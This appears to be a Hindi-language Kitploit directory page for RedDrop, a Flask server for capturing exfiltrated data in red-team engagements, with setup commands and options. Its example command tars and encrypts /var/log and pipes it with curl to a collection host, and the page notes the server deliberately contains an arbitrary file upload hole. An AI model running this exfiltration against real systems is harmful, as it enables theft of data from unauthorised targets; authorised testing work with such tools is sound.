Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RedDrop — Python Flask वेब सर्वर जो एन्कोडेड/एन्क्रिप्टेड पेलोड और tar आर्काइव्स को कैप्चर, प्रोसेस और लॉग करने के लिए डिज़ाइन किया गया है, विशेष रूप से पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए C2 एक्सफिल्ट्रेशन एंडपॉइंट के रूप में। | Kitploit
उपकरण/GitHubGitHub/cyberbutler/reddrop
पेलोड जनरेशनडेटा निष्कासनवेब सुरक्षाकमांड एंड कंट्रोलरेड टीमिंग
GitHubcyberbutler/reddrop

RedDrop

Python Flask वेब सर्वर जो एन्कोडेड/एन्क्रिप्टेड पेलोड और tar आर्काइव्स को कैप्चर, प्रोसेस और लॉग करने के लिए डिज़ाइन किया गया है, विशेष रूप से पेनिट्रेशन टेस्टर्स और रेड टीमर्स के लिए C2 एक्सफिल्ट्रेशन एंडपॉइंट के रूप में।

रिपॉजिटरी देखें
5861 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Red Drop

RedDrop एक्सफिल सर्वर

यहाँ साथ में MaverisLabs ब्लॉग पोस्ट देखें!

RedDrop एक्सफिल सर्वर पेनिट्रेशन टेस्टर्स, रेड टीमर्स और सुरक्षा पेशेवरों के लिए एक Python Flask वेब सर्वर है, जिसमें निम्नलिखित विशेषताएं हैं:

  • फ़ाइल अपलोड
  • स्वचालित पेलोड प्रोसेसिंग
  • स्वचालित आर्काइव निष्कर्षण
  • JSON लॉगिंग
  • कॉन्फ़िगरेबल विकल्प
  • प्राधिकरण नियम

यह सॉफ्टवेयर विभिन्न परिदृश्यों में वेब अनुरोध डेटा कैप्चर करने के लिए एक प्रारंभिक C2 एंडपॉइंट के रूप में उपयोग करने के लिए अभिप्रेत है। कुछ उदाहरणों में शामिल हो सकते हैं:

  • एक अंधा कमांड इंजेक्शन भेद्यता
  • एक XSS हमला जहां त्वरित और गतिशील वेब अनुरोध लॉगिंग सर्वर की आवश्यकता है
  • एक स्थिति जहां रिमोट शेल एक्सेस प्राप्त हुआ है और एक वर्बोज़-लॉगिंग वेब-आधारित एक्सफिल सर्वर वांछित है

डेमो

डेमो

यह प्रोजेक्ट अभी भी विकास में है और कुछ सुविधाओं में बग हो सकते हैं। यदि आपको समस्याएं आती हैं, तो कृपया एक Issue खोलें!

सुरक्षा पर एक नोट

इस सॉफ्टवेयर को सामान्य रूप से व्यापक इंटरनेट पर सुलभ नहीं छोड़ा जाना चाहिए। इसे जानबूझकर एक Arbitrary File Upload भेद्यता के साथ बनाया गया है, और बिना प्रमाणीकरण के फ़ाइलों को स्थानीय डिस्क पर स्वीकार और सहेज लेगा। यह सुनिश्चित करने के लिए उचित परिश्रम किया जाना चाहिए कि जिस सिस्टम पर यह सॉफ्टवेयर तैनात किया गया है वह ठीक से सुरक्षित है। कुछ सिफारिशें:

  • RedDrop की प्राधिकरण नियम सुविधा का उपयोग करके उन अनुरोधों को हटाएं जो आपके मापदंड को पूरा नहीं करते।
  • इस वेब एप्लिकेशन के लिए ट्रैफ़िक को रूट और ब्लॉक करने के लिए एक रिवर्स प्रॉक्सी रखें।
  • अपने लक्ष्य के IP स्पेस को व्हाइटलिस्ट करें।
  • मेरी फ़िल्टरिंग विधि को समझे बिना आर्काइव्स को ऑटो एक्सट्रैक्ट न करें।

त्वरित आरंभ

डॉकर

root@kitploit:~
mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

root@kitploit:~
pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

विकल्प

root@kitploit:~
python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

उदाहरण

Linux सिस्टम से टार आर्काइव और कमांड आउटपुट को एक्सफिल करना

root@kitploit:~
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

कार्य सूची

  • इस वेब सर्वर का उपयोग करके तकनीकों का अधिक दस्तावेज़ीकरण
  • चंक्ड फ़ाइल अपलोड हैंडलिंग और उदाहरण कमांड
  • अधिक प्रोसेसिंग मॉड्यूल
  • आर्काइव निष्कर्षण कार्यक्षमता का विस्तार
टूल डाउनलोड करें